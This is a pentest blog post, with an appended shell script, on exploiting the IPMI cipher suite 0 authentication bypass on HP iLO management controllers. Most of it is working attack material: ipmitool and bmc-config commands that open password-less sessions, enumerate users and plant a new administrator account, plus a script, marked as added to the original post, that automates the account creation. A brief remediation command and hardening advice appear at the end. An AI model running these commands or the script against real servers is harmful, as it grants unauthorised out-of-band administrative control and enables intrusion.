Monday, December 8, 2014

Attacking IPMI Cipher 0

During a pentest last month I ran into something new to me. Nessus returned an "IPMI Cipher Suite Zero Authentication Bypass" finding on several HP iLO servers. I didn't find a lot of research online, so I thought I would share my experience with it. I did end up finding another blog here, which is a great resource as well. Obvious first question: what the heck does that mean? To Wikipedia!!

"The Intelligent Platform Management Interface is a set of computer interface specifications for an autonomous computer subsystem that provides management and monitoring capabilities independently of the host system's CPU, firmware and operating system. IPMI defines a set of interfaces used by system administrators for out-of-band management of computer systems and monitoring of their operation. For example, IPMI provides a way to manage a computer that may be powered off or otherwise unresponsive by using a network connection to the hardware rather than to an operating system or login shell."

Hmmmm, access to "out-of-band management" always sounds good during a pentest! Now what about this "Cipher Suite Zero" part? Nessus helped out here:
"...which permits logon as an administrator without requiring a password".
Cipher suite 0 is the IPMI 2.0 (RMCP+) cipher suite with no authentication, integrity or confidentiality algorithm. A BMC that still has it enabled opens a session for any existing user name whatever password the client supplies, so all an attacker needs is a valid account name, and "Administrator" is the iLO default. Well, that just sounds excellent! In my case I was interested in gaining administrator access to the HP iLO web interface. Although the IPMI interface allowed me to log in without a password, this did not translate to the web interface, so I wanted to leverage it to add my own administrator account. There are free tools for Linux which can communicate with the IPMI interface (FreeIPMI's bmc-config and the separate ipmitool, both used below). So the first step was to install them, which I did on my Kali VM.

sudo apt-get install freeipmi-tools ipmitool

Using these tools it was actually quite simple to accomplish my goal, with just a few commands. The first command lists the users and their privileges on the box. We do this by supplying "Administrator" as the user name and an empty string for the password, while forcing cipher suite 0 with -C 0 (the password is never checked in this suite, so any value would do). For obvious reasons I have scrubbed all the user names from the output below, leaving only Administrator, the default account.

ipmitool -I lanplus -C 0 -H IP_ADDRESS -U Administrator -P "" user list


ID  Name      Callin  Link Auth IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   (Empty User)     true    false      false      NO ACCESS
3   (Empty User)     true    false      false      NO ACCESS
4   (Empty User)     true    false      false      NO ACCESS
5   (Empty User)     true    false      false      NO ACCESS
6   (Empty User)     true    false      false      NO ACCESS
7   (Empty User)     true    false      false      NO ACCESS
8   (Empty User)     true    false      false      NO ACCESS
9   (Empty User)     true    false      false      NO ACCESS
10  (Empty User)     true    false      false      NO ACCESS
11  (Empty User)     true    false      false      NO ACCESS
12  (Empty User)     true    false      false      NO ACCESS


Great, this shows that we can make a valid session and enumerate the user accounts. Now, to add my own user, I need to change the BMC's configuration. FreeIPMI's bmc-config can check that configuration out as a plain text file, which also gives us a backup of the original settings for the client, so let's first look at what it contains.

bmc-config -D LAN_2_0 -I 0 -v -u Administrator -p "" -h IP_ADDRESS -o -f CONFIG_FILE


The above command (-D LAN_2_0 selects IPMI 2.0 over LAN, -I 0 the cipher suite, -o the checkout operation; CONFIG_FILE is a placeholder for the path you want the checkout written to) logs into the BMC and writes its configuration to the file. This may take some time depending on your network. If you examine the downloaded file, it is very easy to see how to add a user. Below is a before and after snip of the config file I was using.
 


Original

...

Section User2
        ## Give Username
        Username                                      (Empty User)
        ## Give password or blank to clear. MAX 16 chars (20 chars if IPMI 2.0 supported).
        ## Password
        ## Possible values: Yes/No or blank to not set
        Enable_User                                   No
        ## Possible values: Yes/No
        Lan_Enable_IPMI_Msgs                          No
        ## Possible values: Yes/No
        Lan_Enable_Link_Auth                          No
        ## Possible values: Yes/No
        Lan_Enable_Restricted_to_Callback             No
        ## Possible values: Callback/User/Operator/Administrator/OEM_Proprietary/No_Access
        Lan_Privilege_Limit                           No_Access
        ## Possible values: 0-17, 0 is unlimited; May be reset to 0 if not specified
        ## Lan_Session_Limit
        ## Possible values: 0-17, 0 is unlimited; May be reset to 0 if not specified
        ## Serial_Session_Limit
EndSection
...

After

...

Section User2
        ## Give Username
        Username                                      AdminUser
        ## Give password or blank to clear. MAX 16 chars (20 chars if IPMI 2.0 supported).
        Password                                      P@$$w0rd
        ## Possible values: Yes/No or blank to not set
        Enable_User                                   Yes
        ## Possible values: Yes/No
        Lan_Enable_IPMI_Msgs                          Yes
        ## Possible values: Yes/No
        Lan_Enable_Link_Auth                          Yes
        ## Possible values: Yes/No
        Lan_Enable_Restricted_to_Callback             No
        ## Possible values: Callback/User/Operator/Administrator/OEM_Proprietary/No_Access
        Lan_Privilege_Limit                           Administrator
        ## Possible values: 0-17, 0 is unlimited; May be reset to 0 if not specified
        ## Lan_Session_Limit
        ## Possible values: 0-17, 0 is unlimited; May be reset to 0 if not specified
        ## Serial_Session_Limit
EndSection

...

You want to choose a section that is labelled (Empty User); otherwise, when you push the new config, you will overwrite a pre-existing user. Note that the checkout contains every section of the BMC configuration, so committing the whole file writes all of it back; bmc-config's --key-pair option lets you commit just the keys you changed if you want to keep the change minimal. The Password key is commented out in the checkout because the BMC will not read passwords back, so it has to be filled in by hand. Also, you may notice I used a somewhat stronger password; in my case my goal is to get into the web server, and I did this since I am unaware whether there is a password policy in place. Lastly, time to commit the config file.


bmc-config -D LAN_2_0 -I 0 -v -u Administrator -p "" -h IP_ADDRESS --commit -f CONFIG_FILE
ERROR: Failed to commit `User2:Lan_Enable_Link_Auth': Invalid/Unsupported Config

The commit reports an error, but it names a single key, User2:Lan_Enable_Link_Auth (this iLO evidently does not accept that setting), so let's check the user list again to see whether the rest of the section was applied, rather than assuming the whole commit failed.
 
ipmitool -I lanplus -C 0 -H IP_ADDRESS -U Administrator -P ""  user list


ID  Name      Callin  Link Auth IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   AdminUser        true    false      true       ADMINISTRATOR
3   (Empty User)     true    false      false      NO ACCESS
4   (Empty User)     true    false      false      NO ACCESS
5   (Empty User)     true    false      false      NO ACCESS
6   (Empty User)     true    false      false      NO ACCESS
7   (Empty User)     true    false      false      NO ACCESS
8   (Empty User)     true    false      false      NO ACCESS
9   (Empty User)     true    false      false      NO ACCESS
10  (Empty User)     true    false      false      NO ACCESS
11  (Empty User)     true    false      false      NO ACCESS
12  (Empty User)     true    false      false      NO ACCESS


Well, look at that, it worked anyway! I am not sure why that error is thrown, but upon further investigation I can now log into the web interface without a problem as well. Normally I like to chase down all errors regardless, but in this situation during a pentest it was unimportant. So there it is, another successful hack for the books.
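The same procedure driven by ipmitool alone, as an added example that is not part of the original post or of the FreeIPMI/ipmitool projects: it opens a cipher 0 session, picks the first (Empty User) slot from the user list so no existing account is overwritten, creates an enabled administrator there, and prints the lan set cipher_privs command that closes the hole for the report. It assumes ipmitool is installed, that the LAN channel is 1 and that the existing account is named Administrator (CHANNEL and IPMITOOL can be overridden in the environment); HOST, NEWUSER and NEWPASS are placeholders, and the embedded user list is a constructed sample used by the parsing functions.

```shell
#!/bin/sh
# Added example (not from the original post): cipher 0 user creation with
# ipmitool only. Assumptions: ipmitool on PATH, LAN channel 1, an existing
# "Administrator" account. HOST/NEWUSER/NEWPASS are placeholders.
set -eu

IPMITOOL="${IPMITOOL:-ipmitool}"
CHANNEL="${CHANNEL:-1}"   # assumption: LAN channel 1, as on the iLOs in the post

# Constructed sample of `ipmitool ... user list` output (mirrors the listing above).
SAMPLE_USER_LIST='ID  Name      Callin  Link Auth IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   (Empty User)     true    false      false      NO ACCESS
3   (Empty User)     true    false      false      NO ACCESS'

# Base invocation. With -C 0 the BMC never checks the password, so "" is just
# a convenient value; the user name must still exist on the BMC.
ipmi() {  # ipmi HOST USER subcommand...
    host="$1"; user="$2"; shift 2
    "$IPMITOOL" -I lanplus -C 0 -H "$host" -U "$user" -P "" "$@"
}

# Print the ID of the first "(Empty User)" slot in a user list, or nothing.
first_empty_slot() {
    printf '%s\n' "$1" | awk '$2 == "(Empty" && $3 == "User)" { print $1; exit }'
}

# Count accounts whose channel privilege limit is ADMINISTRATOR.
admin_count() {
    printf '%s\n' "$1" | awk '$NF == "ADMINISTRATOR" { n++ } END { print n + 0 }'
}

# Print the ipmitool subcommands that turn slot ID into an enabled administrator
# (privilege level 4). Link auth stays off: the iLO above rejected that key and
# it is not needed for LAN or web access.
add_admin_cmds() {  # add_admin_cmds ID NAME PASSWORD  (password must not contain spaces)
    id="$1"; name="$2"; pass="$3"
    printf '%s\n' \
        "user set name $id $name" \
        "user set password $id $pass" \
        "user priv $id 4 $CHANNEL" \
        "channel setaccess $CHANNEL $id callin=on ipmi=on link=off privilege=4" \
        "user enable $id"
}

# Remediation for the report. cipher_privs is a 15-character string, one
# position per cipher suite 0..14: X removes the suite, a caps it at
# Administrator. Only position 1 (cipher suite 0) is removed here.
disable_cipher0_cmd() {
    printf 'lan set %s cipher_privs Xaaaaaaaaaaaaaa\n' "$CHANNEL"
}

# Live run: sh cipher0.sh HOST NEWUSER NEWPASS
main() {
    host="$1"; name="$2"; pass="$3"
    listing="$(ipmi "$host" Administrator user list)" || {
        echo "cipher 0 session refused; BMC does not look vulnerable" >&2; exit 1; }
    slot="$(first_empty_slot "$listing")"
    [ -n "$slot" ] || { echo "no free user slot" >&2; exit 1; }
    echo "using slot $slot (administrators before: $(admin_count "$listing"))"
    add_admin_cmds "$slot" "$name" "$pass" | while read -r line; do
        # shellcheck disable=SC2086  # word-split the subcommand on purpose
        ipmi "$host" Administrator $line
    done
    ipmi "$host" Administrator user list
    echo "remediation: $IPMITOOL ... $(disable_cipher0_cmd)"
}

if [ "$#" -eq 3 ]; then
    main "$@"
fi
```

Setting the channel access explicitly avoids the Lan_Enable_Link_Auth error seen with bmc-config; the listing above shows that route had already applied the other keys (Link Auth false, everything else as requested), so either way you end up with a working administrator. Cipher suites 1 and 2 are also weak (no integrity, or no confidentiality), so once cipher 0 is gone consider restricting the BMC to suites 3, 8 or 12 and firewalling the management network; check ipmitool lan print first, because removing the only suite the site's management tools use locks the real admins out.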
